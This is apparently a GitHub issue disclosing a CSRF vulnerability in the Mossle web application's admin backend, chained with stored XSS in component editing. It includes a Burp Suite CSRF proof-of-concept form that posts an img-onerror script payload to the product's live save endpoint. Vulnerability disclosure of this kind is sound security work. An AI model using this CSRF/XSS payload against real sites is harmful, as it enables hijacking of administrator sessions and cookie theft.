-
Notifications
You must be signed in to change notification settings - Fork 1.6k
Open
Description
Product Homepage: http://www.mossle.com/index.do
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.
There is an xss in the place of Editing component
We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie
Csrf Exp:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.mossle.com/portal/save.do" method="POST">
<input type="hidden" name="portalWidgetId" value="5557079425024" />
<input type="hidden" name="portalItemName" value="<img src=x onerror=alert('cookie')>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Metadata
Metadata
Assignees
Labels
No labels

